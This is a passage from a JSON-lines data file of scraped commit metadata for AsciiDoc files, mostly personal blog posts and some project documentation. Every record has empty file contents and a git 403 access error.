typos\r\n","repos":"jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/02\/22\/pandas-and-hawkular-metrics.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/02\/22\/pandas-and-hawkular-metrics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a627852b38653c33fe69c31d1598958e614668b9","subject":"y2b create post The Dual Camera Honor 8 Smartphone","message":"y2b create post The Dual Camera Honor 8 Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-18-The-Dual-Camera-Honor-8-Smartphone.adoc","new_file":"_posts\/2016-08-18-The-Dual-Camera-Honor-8-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e257cfd30bb196a985f198c8387bdd74cecd0db","subject":"Publish 19-02-2015-Manual.adoc","message":"Publish 19-02-2015-Manual.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"19-02-2015-Manual.adoc","new_file":"19-02-2015-Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3311cd0554adc709eb0f73d74635b3b2f769c8fd","subject":"Add missing closing statement for code block","message":"Add missing closing statement for code block\n","repos":"mehtabsinghmann\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19481cd5987071864e151dce386b99a68b01346e","subject":"Update 2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","message":"Update 2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","new_file":"_posts\/2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d54c8c0c178848999a4712717f961239da04d405","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88dbba4b4cc377faf0751112b44102cb3df1dfd6","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecc57910bff52732805180ea297da170f7aff568","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e56f7c9aab22c6d8141c11954c2daf68ae2ca61","subject":"Update 2016-10-02-Settling-in-Japan.adoc","message":"Update 2016-10-02-Settling-in-Japan.adoc","repos":"endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog","old_file":"_posts\/2016-10-02-Settling-in-Japan.adoc","new_file":"_posts\/2016-10-02-Settling-in-Japan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bdb48507f67de14a51b31dc19c99ab86daada88","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c6bf63ffe1a3b9ab811a7b0003baaab4f9c445","subject":"Renamed '_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc' to '_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc'","message":"Renamed '_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc' to '_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc'","repos":"ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com","old_file":"_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_file":"_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahopkins\/amhopkins.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6c6c14503efc70194cca7fe50b072b774efe868","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9af37e569e8df47b9d1670ae6a80e401736effd7","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a478f4d2340ff3c0d6024ae89adf03832cd5ddc8","subject":"Fix links","message":"Fix links","repos":"joachimmetz\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,Onager\/artifacts,Onager\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6488a31890f6fa169716d483f7cb7fe7a48a8b62","subject":"Update 2015-04-28-Hello.adoc","message":"Update 2015-04-28-Hello.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2015-04-28-Hello.adoc","new_file":"_posts\/2015-04-28-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bahamoth\/bahamoth.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b13493aa15b484dece338dff24b0b772d5ec4b","subject":"Update 2016-11-29-Draft.adoc","message":"Update 2016-11-29-Draft.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-11-29-Draft.adoc","new_file":"_posts\/2016-11-29-Draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b025eefc08162205ee7977ddd62a9475fef7233a","subject":"y2b create post PS3 TwistDock Unboxing \\u0026 Overview","message":"y2b create post PS3 TwistDock Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-27-PS3-TwistDock-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-27-PS3-TwistDock-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f373dfeacfc58155e9e22a44354a600da9c48394","subject":"Update 2015-04-02-Up-and-running.adoc","message":"Update 2015-04-02-Up-and-running.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-04-02-Up-and-running.adoc","new_file":"_posts\/2015-04-02-Up-and-running.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26813f36249da0781f68d5e3121e875eddcd66c5","subject":"Update 2015-05-14-Little-updates.adoc","message":"Update 2015-05-14-Little-updates.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-14-Little-updates.adoc","new_file":"_posts\/2015-05-14-Little-updates.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eb939aa4a3c9844ea6fc6db37e3bb9b94c4ae33","subject":"Update 2020-04-27-The-onboarding.adoc","message":"Update 2020-04-27-The-onboarding.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-27-The-onboarding.adoc","new_file":"_posts\/2020-04-27-The-onboarding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"508fa12357e69e6bdb168df474515981dc4ecd0c","subject":"Update 2016-07-21-2016-07-21.adoc","message":"Update 2016-07-21-2016-07-21.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-21-2016-07-21.adoc","new_file":"_posts\/2016-07-21-2016-07-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f74ccd05299fdf87df0436258f752baba1b8975","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65520ebf6902df658199aab09013305a515d3d2e","subject":"y2b create post Essential Phone Unboxing - Is This Your Next Phone?","message":"y2b create post Essential Phone Unboxing - Is This Your Next Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-18-Essential-Phone-Unboxing--Is-This-Your-Next-Phone.adoc","new_file":"_posts\/2017-08-18-Essential-Phone-Unboxing--Is-This-Your-Next-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faa3f8207bab58406d0f63304d55260032051882","subject":"Add changelog","message":"Add changelog","repos":"oskopek\/irsee.net,oskopek\/irsee.net","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/irsee.net.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a2a3029f329f6e72073131489ef2ef0f13aaaa1","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9bc50ea47ae0853d29ee71169c1a450af4fc577","subject":"Update 2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","message":"Update 2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","new_file":"_posts\/2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"629d9ee6af398d93d3684a87548ba50eacb89238","subject":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39bbd13a5cebe3164c41e9e1e0a26921bc82a344","subject":"Update 2015-07-28-My-First-Time-Y-Combinator-Application.adoc","message":"Update 2015-07-28-My-First-Time-Y-Combinator-Application.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-28-My-First-Time-Y-Combinator-Application.adoc","new_file":"_posts\/2015-07-28-My-First-Time-Y-Combinator-Application.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d24aedc827e0a1e84ad72bb21bba87948c95144","subject":"Update 2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","message":"Update 2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","new_file":"_posts\/2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa31021c15321320f2b04a7e5c662811668edea2","subject":"Update 2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","message":"Update 2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","new_file":"_posts\/2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc41b4d4dd475a584b90dfeaac0b0cce4b54881e","subject":"CAMEL-13165 - Docs updated","message":"CAMEL-13165 - Docs updated\n","repos":"zregvart\/camel,christophd\/camel,CodeSmell\/camel,adessaigne\/camel,christophd\/camel,nikhilvibhav\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,mcollovati\/camel,ullgren\/camel,pmoerenhout\/camel,pax95\/camel,ullgren\/camel,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,objectiser\/camel,objectiser\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,zregvart\/camel,zregvart\/camel,punkhorn\/camel-upstream,tdiesler\/camel,cunningt\/camel,punkhorn\/camel-upstream,gnodet\/camel,tdiesler\/camel,pax95\/camel,pmoerenhout\/camel,christophd\/camel,objectiser\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,pmoerenhout\/camel,alvinkwekel\/camel,adessaigne\/camel,pmoerenhout\/camel,CodeSmell\/camel,tdiesler\/camel,apache\/camel,nikhilvibhav\/camel,tadayosi\/camel,punkhorn\/camel-upstream,gnodet\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,christophd\/camel,CodeSmell\/camel,ullgren\/camel,davidkarlsen\/camel,adessaigne\/camel,alvinkwekel\/camel,apache\/camel,alvinkwekel\/camel,pax95\/camel,mcollovati\/camel,nikhilvibhav\/camel,Fabryprog\/camel,pax95\/camel,apache\/camel,davidkarlsen\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,tadayosi\/camel,gnodet\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,davidkarlsen\/camel,nicolaferraro\/camel,Fabryprog\/camel,adessaigne\/camel,Fabryprog\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,ullgren\/camel,pax95\/camel,apache\/camel,apache\/camel,mcollovati\/camel,DariusX\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,nicolaferraro\/camel,objectiser\/camel,mcollovati\/camel,tadayosi\/camel,Fabryprog\/camel","old_file":"components\/camel-aws-msk\/src\/main\/docs\/aws-msk-component.adoc","new_file":"components\/camel-aws-msk\/src\/main\/docs\/aws-msk-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3f37c3d4c1c493dd77ad3130db3cb5d0f6c7f48","subject":"Update 2015-07-01-Hybris-E-commerce-suite.adoc","message":"Update 2015-07-01-Hybris-E-commerce-suite.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybris-E-commerce-suite.adoc","new_file":"_posts\/2015-07-01-Hybris-E-commerce-suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f9b101c16a8b9f1940fab458b3456eaa08c477","subject":"Update 2017-07-26-Test-IE-False-Positives.adoc","message":"Update 2017-07-26-Test-IE-False-Positives.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-26-Test-IE-False-Positives.adoc","new_file":"_posts\/2017-07-26-Test-IE-False-Positives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"563e4169a7f9d370a3e5cd32c72820077516aa2d","subject":"Update 2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","message":"Update 2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","new_file":"_posts\/2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a03b44693152f5c4979760f15ae8c718b10e86","subject":"Create README-ja.adoc","message":"Create README-ja.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"092fd64ff195a72821ee4d0b9fa5c3e5e430e7c2","subject":"2016-07-18-trees.adoc","message":"2016-07-18-trees.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-18-trees.adoc","new_file":"_posts\/2016-07-18-trees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9b7fcd0daff4541a02a38e99ae5b43c5a048f19","subject":"Update 2016-12-2-3-Dpen.adoc","message":"Update 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-Dpen.adoc","new_file":"_posts\/2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"640a1e14fe623c3d0ba807cb22f9c2afbda2d8f2","subject":"Update 2016-09-09-Sample-Header.adoc","message":"Update 2016-09-09-Sample-Header.adoc","repos":"theblankpages\/theblankpages.github.io,theblankpages\/theblankpages.github.io,theblankpages\/theblankpages.github.io,theblankpages\/theblankpages.github.io","old_file":"_posts\/2016-09-09-Sample-Header.adoc","new_file":"_posts\/2016-09-09-Sample-Header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theblankpages\/theblankpages.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89465c2f46ce654fa8e343ddee33f695785cccee","subject":"Update 2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","message":"Update 2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","new_file":"_posts\/2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6ac79494bae80c4188b45994613b6861832bb9","subject":"Update 2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","message":"Update 2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","new_file":"_posts\/2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12661eefb4713eff6a32a57a16920b78af59946a","subject":"Update 2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","message":"Update 